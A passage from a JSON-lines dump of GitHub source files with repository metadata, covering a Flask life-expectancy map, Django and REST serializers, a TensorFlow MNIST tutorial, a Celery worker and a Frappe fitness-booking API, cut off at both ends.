neighbor_lfe = fips_to_lfe[neighbor]\r\n disparity = abs(tract_lfe - neighbor_lfe)\r\n g.add_edge(tract, neighbor, disparity=disparity)\r\n # remove the node from the graph if the node is not in the life\r\n # expectancy dataset\r\n elif tract in g.nodes:\r\n g.remove_node(tract)\r\n\r\n sorted_list = sorted(g.edges(data=True), key=lambda x: x[2]['disparity'], reverse=True)\r\n\r\n return lfe, sorted_list, gdf\r\n\r\n\r\nlife_expectancy = Blueprint('life_expectancy', __name__, template_folder='templates')\r\n\r\n@life_expectancy.route('/folium')\r\n# read config file and return json to the client!\r\ndef get_map():\r\n limit = request.args.get('limit')\r\n lfe, sorted_list, gdf = load_data()\r\n\r\n top_50 = sorted_list[:int(limit)]\r\n top_50_tracts = []\r\n for t in top_50:\r\n if t[0] not in top_50_tracts:\r\n top_50_tracts.append(t[0])\r\n if t[1] not in top_50_tracts:\r\n top_50_tracts.append(t[1])\r\n\r\n \r\n top_50_tracts_gdf = gdf[gdf.index.isin(top_50_tracts)].reset_index()[['GEOID', 'geometry', 'life_expectancy']]\r\n top_50_tracts_gdf.to_file('selected_tracts.geojson', driver='GeoJSON')\r\n\r\n\r\n m = folium.Map(tiles='cartodbpositron', min_zoom=4, zoom_start=4.25, \r\n max_bounds=True,location=[33.8283459,-98.5794797],\r\n min_lat=5.499550, min_lon=-160.276413, \r\n max_lat=83.162102, max_lon=-52.233040)\r\n marker_cluster = MarkerCluster(\r\n options = {'maxClusterRadius':15, \r\n 'disableCusteringAtZoom':5, \r\n 'singleMarkerMode':True}).add_to(m)\r\n folium.Choropleth(\r\n geo_data = 'selected_tracts.geojson',\r\n data = lfe,\r\n columns = ['GEOID','life_expectancy'],\r\n fill_color = 'YlGn',\r\n key_on = 'feature.properties.GEOID',\r\n name = 'geojson',\r\n legend_name='Life Expectancy'\r\n ).add_to(m)\r\n\r\n for i, tract in top_50_tracts_gdf.iterrows():\r\n x = tract.geometry.centroid.x\r\n y = tract.geometry.centroid.y\r\n l = tract.life_expectancy\r\n folium.CircleMarker([y, x], radius=8, color='black', \r\n fill_color='white', fill_opacity=0.5, \r\n tooltip='Life expectancy: {}'.format(str(l))).add_to(marker_cluster)\r\n \r\n f = folium.Figure()\r\n title = 'Does your census tract determine how ' + \\\r\n 'long you will live? '\r\n subtitle = 'Census tract neighbors across ' + \\\r\n 'the U.S. with the widest disparities ' + \\\r\n 'in life expectancy '\r\n f.html.add_child(folium.Element(title))\r\n f.html.add_child(folium.Element(subtitle))\r\n f.add_child(m)\r\n\r\n # not sure if this works\r\n # data = {'html': f.html}\r\n # if it does not, you can save the file and read it as text\r\n f.save(\"map.html\")\r\n file = open(\"map.html\", \"r\") \r\n data = {'html': file.read()}\r\n \r\n return jsonify(data)\r\n", "repo_name": "pramod-thaz/xls_manager", "sub_path": "services/analytics/life_expectancy.py", "file_name": "life_expectancy.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 44, "usage_type": "call"}, {"api_name": "pysal.weights.Rook.from_dataframe", "line_number": 47, "usage_type": "call"}, {"api_name": "pysal.weights", "line_number": 47, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.Blueprint", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "folium.Map", "line_number": 97, "usage_type": "call"}, {"api_name": "folium.plugins.MarkerCluster", "line_number": 101, "usage_type": "call"}, {"api_name": "folium.Choropleth", "line_number": 105, "usage_type": "call"}, {"api_name": "folium.CircleMarker", "line_number": 119, "usage_type": "call"}, {"api_name": "folium.Figure", "line_number": 123, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 129, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "38197084093", "text": "\nfrom rest_framework.serializers import ModelSerializer\n\nfrom positions.models import PositionPing\n\nclass PositionPingSerializer(ModelSerializer):\n class Meta:\n model = PositionPing\n fields = [\n 'latitude', 'longitude', 'altitude', \n 'accuracy', 'altitude_accuracy', 'heading', \n 'speed', 'timestamp', 'logged_at'\n ]\n", "repo_name": "thedejijoseph/touchdown", "sub_path": "positions/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "name"}, {"api_name": "positions.models.PositionPing", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "27364467545", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pkg import *\nplt.figure(figsize=(8,6))\ngrade = ('before 2010','2010','2011','2012')\nx_pos = np.arange(len(grade))\nperformance = [4.59,23.85,32.11,39.45]\n\nret = plt.bar(x_pos,performance,0.35,color='b',align='center',alpha=0.8)\nplt.xticks(x_pos,grade)\nplt.ylabel('percentage (%)')\nplt.title('The percentage of grade')\nautolabel(ret)\nplt.show()\n", "repo_name": "daozl/james", "sub_path": "code/bar/grade.py", "file_name": "grade.py", "file_ext": "py", "file_size_in_byte": 446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "29128693179", "text": "import json\n\nfrom graphbrain import hgraph\n\n\ndef run(args):\n print('exporting hypergraph...')\n hg = hgraph(args.hg)\n n = 0\n with open(args.outfile, 'w') as f:\n for edge, attributes in hg.all_attributes():\n row = [edge.to_str(), attributes]\n f.write('{}\\n'.format(\n json.dumps(row, ensure_ascii=False)))\n n += 1\n print('{} edges exported.'.format(n))\n", "repo_name": "codeaudit/graphbrain", "sub_path": "graphbrain/commands/export.py", "file_name": "export.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphbrain.hgraph", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "17416543573", "text": "from .integration import (\n get_category_id_to_tag_id_dictionary,\n image_annotations_to_region,\n)\nfrom .azure_blob import download_json, get_container_sas_token\nfrom tqdm import tqdm\nfrom azure.cognitiveservices.vision.customvision.training.models import (\n ImageUrlCreateEntry,\n)\n\n\ndef import_coco_to_custom_vision(\n custom_vision_client,\n custom_vision_project,\n blob_container_client,\n storage_path,\n coco_file_name,\n):\n # Read coco dataset definition\n file_name = coco_file_name\n if storage_path is not None and len(storage_path) > 0:\n file_name = f\"{storage_path}{coco_file_name}\"\n coco_dataset = download_json(blob_container_client, file_name)\n\n category_id_to_tag_id_dictionary = get_category_id_to_tag_id_dictionary(\n coco_dataset, custom_vision_client, custom_vision_project\n )\n\n container_sas_token = get_container_sas_token(blob_container_client)\n\n images_to_upload = []\n for image in tqdm(\n coco_dataset[\"images\"],\n ascii=True,\n desc=\"Preparing coco images\",\n ):\n image_url = f\"{image['coco_url']}?{container_sas_token}\"\n regions = image_annotations_to_region(\n coco_dataset[\"annotations\"], image, category_id_to_tag_id_dictionary\n )\n images_to_upload.append(ImageUrlCreateEntry(url=image_url, regions=regions))\n\n custom_vision_client.upload_images_from_url(custom_vision_project, images_to_upload)\n", "repo_name": "rndazurescript/Coco2CustomVision", "sub_path": "src/coco2customvision/import_coco.py", "file_name": "import_coco.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "azure_blob.download_json", "line_number": 23, "usage_type": "call"}, {"api_name": "integration.get_category_id_to_tag_id_dictionary", "line_number": 25, "usage_type": "call"}, {"api_name": "azure_blob.get_container_sas_token", "line_number": 29, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}, {"api_name": "integration.image_annotations_to_region", "line_number": 38, "usage_type": "call"}, {"api_name": "azure.cognitiveservices.vision.customvision.training.models.ImageUrlCreateEntry", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "7053299679", "text": "# Lab 9-MNIST\n# Made by: Jinmin Goh\n# Date: 20200306\n\n# MNIST dataset wide deep NN model with tensorboard\n# Acc: 94.2%\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport random\ntf.set_random_seed(777) # for reproducibility\nfrom tensorflow.examples.tutorials.mnist import input_data\n# Check out https://www.tensorflow.org/get_started/mnist/beginners for\n# more information about the mnist dataset\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nnb_classes = 10\n#MNIST_size = 784\n#hidden_size = 20\n\nX = tf.placeholder(tf.float32, [None, 784])\nY = tf.placeholder(tf.float32, [None, nb_classes])\n\n# layer 1: weight number same with MNIST_size\nwith tf.name_scope(\"Layer1\"):\n W1 = tf.Variable(tf.random_normal([784, 128]), name='weight1')\n b1 = tf.Variable(tf.random_normal([128]), name='bias1')\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\n # histogram\n tf.summary.histogram(\"W1\", W1)\n tf.summary.histogram(\"b1\", b1)\n tf.summary.histogram(\"Layer1\", layer1)\n# layer 2: hidden layer\nwith tf.name_scope(\"Layer2\"):\n W2 = tf.Variable(tf.random_normal([128, 32]), name='weight2')\n b2 = tf.Variable(tf.random_normal([32]), name='bias2')\n layer2 = tf.sigmoid(tf.matmul(layer1, W2) + b2)\n tf.summary.histogram(\"W2\", W2)\n tf.summary.histogram(\"b2\", b2)\n tf.summary.histogram(\"Layer2\", layer2)\n# layer 3: hidden layer\nwith tf.name_scope(\"Layer3\"):\n W3 = tf.Variable(tf.random_normal([32, 16]), name='weight3')\n b3 = tf.Variable(tf.random_normal([16]), name='bias3')\n layer3 = tf.sigmoid(tf.matmul(layer2, W3) + b3)\n tf.summary.histogram(\"W3\", W3)\n tf.summary.histogram(\"b3\", b3)\n tf.summary.histogram(\"Layer3\", layer3)\n# layer 4: 10 classifications\nwith tf.name_scope(\"Layer4\"):\n W4 = tf.Variable(tf.random_normal([16, nb_classes]), name='weight4')\n b4 = tf.Variable(tf.random_normal([nb_classes]), name='bias4')\n hypothesis = tf.nn.softmax(tf.matmul(layer3, W4) + b4)\n tf.summary.histogram(\"W3\", W4)\n tf.summary.histogram(\"b3\", b4)\n tf.summary.histogram(\"Hypothesis\", hypothesis)\n\n# Cross entropy\nwith tf.name_scope(\"Cost\"):\n cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1))\n tf.summary.scalar(\"Cost\", cost)\nwith tf.name_scope(\"Train\"):\n train = tf.train.GradientDescentOptimizer(learning_rate = 1).minimize(cost)\n\n# Test model\nis_correct = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))\n# Calculate accuracy\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\ntf.summary.scalar(\"Accuracy\", accuracy)\n\n# parameters\nnum_epochs = 15 # training count of entinre training data\nbatch_size = 100 # splitting size of whole dataset\nnum_iterations = int(mnist.train.num_examples / batch_size)\n\nwith tf.Session() as sess:\n # Initialize TensorFlow variables\n merged_summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"./logs/MNIST\")\n writer.add_graph(sess.graph)\n sess.run(tf.global_variables_initializer())\n # Training cycle\n for epoch in range(num_epochs):\n avg_cost = 0\n for i in range(num_iterations):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary, cost_val = sess.run([train, merged_summary, cost], feed_dict={X: batch_xs, Y: batch_ys})\n avg_cost += cost_val / num_iterations\n writer.add_summary(summary, global_step = i + epoch * num_iterations)\n print(\"Epoch: {:04d}, Cost: {:.9f}\".format(epoch + 1, avg_cost))\n print(\"Learning finished\")\n # Test the model using test sets\n print(\n \"Accuracy: \",\n accuracy.eval(\n session=sess, feed_dict={X: mnist.test.images, Y: mnist.test.labels}\n ),\n )\n # Get one and predict\n r = random.randint(0, mnist.test.num_examples - 1)\n print(\"Label: \", sess.run(tf.argmax(mnist.test.labels[r : r + 1], 1)))\n print(\n \"Prediction: \",\n sess.run(tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r : r + 1]}),\n )\n plt.imshow(\n mnist.test.images[r : r + 1].reshape(28, 28),\n cmap=\"Greys\",\n interpolation=\"nearest\",\n )\n plt.show()\n\n", "repo_name": "Jinmin-Goh/DeepLearningPractice", "sub_path": "Lab/Lab9/Lab9-MNIST.py", "file_name": "Lab9-MNIST.py", "file_ext": "py", "file_size_in_byte": 4128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}]}
+{"seq_id": "14127294857", "text": "from django import views\nfrom django.urls import include, path\nfrom . import views\n\nurlpatterns = [\n path('',views.index, name='index'), #uses \"from . import views\"\n path('login/',views.login, name='login'),\n path('register/',views.register, name='register'),\n path('products/',views.products, name='products'),\n path('single/',views.single, name='single'),\n path('add-to-cart/',views.add_to_cart, name='add-to-cart'),\n path('cart/',views.cart, name='cart'),\n path('delete-cart/',views.delete_cart,name='delete-cart'),\n path('checkout/',views.checkout,name='checkout'),\n path('success/',views.success,name='success'),\n]\n", "repo_name": "ankitpatelcs/EcomDjangoProject", "sub_path": "myapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.login", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.register", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.views.products", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.views.single", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.views.add_to_cart", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.views.cart", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.views.delete_cart", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.views.checkout", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.views.success", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "75297970408", "text": "import os\nimport importlib\nimport typing as t\n\nimport numpy as np\nfrom celery import Celery, states\nfrom celery.exceptions import Ignore\n\n\ncelery = Celery(__name__)\nREDIS_URL = \"redis://{host}:{port}/0\".format(\n host=os.getenv('REDIS_HOST', 'localhost'),\n port=os.getenv('REDIS_PORT', '6379')\n)\ncelery.conf.broker_url = REDIS_URL\ncelery.conf.result_backend = REDIS_URL\n\n\n@celery.task(bind=True, name='tasks.vectorize_text')\ndef vectorize_text(self, text: str) -> t.List[float]:\n # Lazy import!\n # If TextVectorizer is imported globally,\n # you shuold install large dependencies (like torch) to FastAPI container. \n text_vectorizer = importlib.import_module('src.ml.text_vectorizer')\n\n text = text[:256] if len(text) >= 256 else text\n try:\n res = text_vectorizer.TextVectorizer.vectorize(text)\n if isinstance(res, np.ndarray):\n res = res.tolist()\n return res\n except Exception as e:\n self.update_state(\n state = states.FAILURE,\n meta = e\n )\n raise Ignore()\n ", "repo_name": "fyk7/text-vectorizer-k8s", "sub_path": "src/worker/worker.py", "file_name": "worker.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "celery.Celery", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "celery.conf", "line_number": 15, "usage_type": "attribute"}, {"api_name": "celery.conf", "line_number": 16, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 29, "usage_type": "attribute"}, {"api_name": "celery.states.FAILURE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "celery.states", "line_number": 34, "usage_type": "name"}, {"api_name": "celery.exceptions.Ignore", "line_number": 37, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 19, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "33956342074", "text": "import frappe\nfrom frappe.website.utils import is_signup_enabled\nfrom frappe.utils import escape_html\nfrom frappe.utils import getdate, get_time, flt, now_datetime\nfrom club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment import cancel_appointment_online\nfrom datetime import datetime, timedelta, date, time\nfrom frappe import throw, msgprint, _\nfrom club_crm.api.wallet import get_balance\n\n@frappe.whitelist()\ndef get_fitness_category(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if not client.status == \"Disabled\":\n doc = frappe.get_all('Fitness Training Request', filters={'client_id':client.name, 'request_status':['in', {'Pending','Scheduled'}]}, fields=['*'])\n if doc:\n for doc_1 in doc:\n if doc_1.request_status==\"Pending\":\n frappe.response[\"message\"] = {\n \"Status\":0,\n \"Status Message\": \"A pending request exists\",\n \"Document ID\" : doc_1.name\n }\n else:\n schedule=frappe.get_list('Fitness Training Trainer Scheduler', filters={'parent':doc_1.name,'parentfield':'table_schedule'}, fields=['day','date','from_time','to_time'], order_by=\"date asc\")\n \n frappe.response[\"message\"] = {\n \"Status\":1,\n \"disabled\": 0,\n \"Status Message\": \"Training has been scheduled\",\n \"Document ID\": doc_1.name,\n \"rate\": doc_1.price,\n \"package_name\": doc_1.fitness_package,\n \"Number of Sessions\": doc_1.number_of_sessions,\n \"Schedule\": schedule\n }\n else:\n fitness_category = frappe.get_all('Fitness Services', filters={'on_app': 1}, fields=['fitness_name','image'])\n fitness_item = []\n for item in fitness_category:\n fitness_item.append({\n \"category_name\" : item.fitness_name,\n \"category_image\" : item.image\n })\n frappe.response[\"message\"] = {\n \"Status\":2,\n \"disabled\": 0,\n \"Fitness Categories\": fitness_item\n }\n else:\n frappe.response[\"message\"] = {\n \"Status\":3,\n \"disabled\": 1\n }\n\n@frappe.whitelist()\ndef get_fitness_package(fitness_category):\n fit_category = frappe.get_doc('Fitness Services', fitness_category)\n all_fitness_package = frappe.get_all('Club Packages', filters={'on_app': 1, 'package_type': 'Fitness'})\n packages = []\n for item in all_fitness_package:\n single_package = frappe.get_doc('Club Packages', item.name)\n for package in single_package.package_table:\n if package.service_name == fitness_category:\n sessions = int(package.no_of_sessions/4)\n if sessions == 0:\n sessions = 1\n validity = int(package.validity // (24 * 3600))\n packages.append({\n \"name\": item.name,\n \"duration\": int(fit_category.duration),\n \"no_of_session\": package.no_of_sessions,\n \"validity\": validity,\n \"sessions_per_week\": sessions,\n \"price\": package.price,\n \"fitness_category\": fitness_category\n })\n \n frappe.response[\"message\"] = {\n \"Fitness Categories\": packages\n }\n\n@frappe.whitelist()\ndef get_trainer(fitness_package,client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n club_package = frappe.get_doc('Club Packages', fitness_package)\n for package in club_package.package_table:\n fit_trainer = frappe.get_all('Fitness Services Assignment', filters={'fitness_package': package.service_name, 'on_app':1}, fields=['name','parent','parenttype','parentfield','gender_preference'])\n trainers = []\n for trainer in fit_trainer:\n doc_1 = frappe.get_doc('Service Staff', trainer.parent)\n if doc_1.on_app == 1:\n if trainer.gender_preference == \"Same Gender\":\n if doc_1.gender == client.gender:\n trainers.append({\n 'Trainer': doc_1.display_name,\n 'Description': doc_1.description,\n 'Image': doc_1.image,\n 'Gender': doc_1.gender\n })\n elif trainer.gender_preference == \"No Preference\":\n trainers.append({\n \"Trainer\": doc_1.display_name,\n \"Description\": doc_1.description,\n \"Image\": doc_1.image,\n \"Gender\": doc_1.gender\n })\n return trainers\n\n@frappe.whitelist()\ndef get_pt_appointments():\n rating_point = -1\n disabled = 0\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if client.status == \"Disabled\":\n disabled = 1\n time = frappe.get_doc('Fitness Training Settings')\n\n sessions = []\n client_session_list = frappe.get_all('Client Sessions', filters={'client_id': client.name, 'session_status': 'Active', 'package_type': 'Fitness'}, order_by=\"expiry_date asc\")\n if client_session_list:\n for client_session in client_session_list:\n client_session_doc = 